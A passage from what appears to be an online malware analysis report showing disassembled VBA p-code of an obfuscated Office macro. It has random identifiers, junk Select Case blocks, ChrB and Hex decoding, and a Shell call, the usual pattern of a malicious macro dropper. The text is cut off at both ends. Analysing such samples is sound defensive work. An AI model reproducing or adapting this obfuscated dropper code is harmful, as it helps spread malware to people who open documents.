' ArgsMemLd Interaction 0x0002
' Ld Shell
' ArgsArray Array 0x0005
' St vdtAuqsvdzWpKfzRs
' Line #166:
' Ld zrnBSJbPi
' SelectCase
' Line #167:
' LitDI4 0x5092 0x0BA1
' Case
' CaseDone
' Line #168:
' LitDI4 0x3057 0x0060
' LitDI4 0x9B9F 0x0F17
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St jXJcKUPaONYZsMpp
' Line #169:
' Ld iQULChrAainTTOPjbKhmq
' St OXCwlSllQrjDEXCq
' Line #170:
' LitDI4 0x8631 0x0978
' Case
' CaseDone
' Line #171:
' LitDI4 0xB104 0x014B
' St ZDXtKIAXBLDFzutLzRuSLDd
' Line #172:
' LitDI4 0x4447 0x1118
' St porajTAtnqQnIXiz
' Line #173:
' EndSelect
' Line #174:
' SetStmt
' Ld LMEcYqtLSIVBHw
' Set cQOOUmPLQrXfVazjVUJwV
' Line #175:
' Ld CQKrVWjFWzZrhu
' ArgsLd Hex 0x0001
' St UEKUDIWHUqocCOqGLkN
' Line #176:
' Ld EmAoupEjmkOrwbBJQuvXDuTz
' SelectCase
' Line #177:
' LitDI4 0x9934 0x11B5
' Case
' CaseDone
' Line #178:
' LitDI4 0x0D57 0x0B8B
' LitDI4 0x9C59 0x0806
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St EiPQHzJccTiVMK
' Line #179:
' Ld AcudRNYrHSGiNzdqHwFBUOoO
' St OqiJEbrIUBwpOnFrWAvcXp
' Line #180:
' LitDI4 0x9024 0x007E
' Case
' CaseDone
' Line #181:
' LitDI4 0xDDF2 0x07E9
' St wLOQQZNNKDwwiCoazHUwJJ
' Line #182:
' LitDI4 0x64F9 0x131B
' St lQsXTfmnjqTCJbqtt
' Line #183:
' EndSelect
' Line #184:
' SetStmt
' Ld AjpuiQLQoilQWQaEoGFn
' Set wiuctRbWHUPioK
' Line #185:
' Ld KzqtLpiFJnMhjCWlrAdD
' ArgsLd Hex 0x0001
' St owFrIfTQLirMwqNEZYfTdnL
' Line #186:
' Ld DaZMAPiaTNAnZhIoZEWwmDI
' SelectCase
' Line #187:
' LitDI4 0xC2AD 0x0BCD
' Case
' CaseDone
' Line #188:
' LitDI4 0xA9F1 0x0C62
' LitDI4 0xC131 0x0D04
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St CRAipWRLFwrqnDpKblljGkRY
' Line #189:
' Ld adDckSpRAcENjwiAv
' St qVcFCDziESvHBKwFRtA
' Line #190:
' LitDI4 0xA0E4 0x1024
' Case
' CaseDone
' Line #191:
' LitDI4 0x2799 0x01B1
' St qJzXOUjalBTYXwuXuwBZSh
' Line #192:
' LitDI4 0x139F 0x0DD0
' St STCniCWQzMpXSDOjtKhnwb
' Line #193:
' EndSelect
' Line #194:
' SetStmt
' Ld CaLJXFqkSjIABoqPzUVA
' Set TIBkzVUIUNFvRvw
' Line #195:
' Ld LITZOjUbajrlzScUAsRAjv
' ArgsLd Hex 0x0001
' St RcsjCFwTRzNwJvBtwvCKzj
' Line #196:
' Ld rsoVAYTpmknjXj
' SelectCase
' Line #197:
' LitDI4 0xFDCA 0x0C5A
' Case
' CaseDone
' Line #198:
' LitDI4 0xE84E 0x1186
' LitDI4 0x4BE0 0x1132
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St iSmKAozJiDAfGHWA
' Line #199:
' Ld hCmjIUcBsOQcIOtwZoFKY
' St UzwpVNWuiYZBKKwnjcuU
' Line #200:
' LitDI4 0xADF6 0x0F45
' Case
' CaseDone
' Line #201:
' LitDI4 0xA595 0x134F
' St jspjSXtFKncQRnihNaBXj
' Line #202:
' LitDI4 0xC935 0x0BE8
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.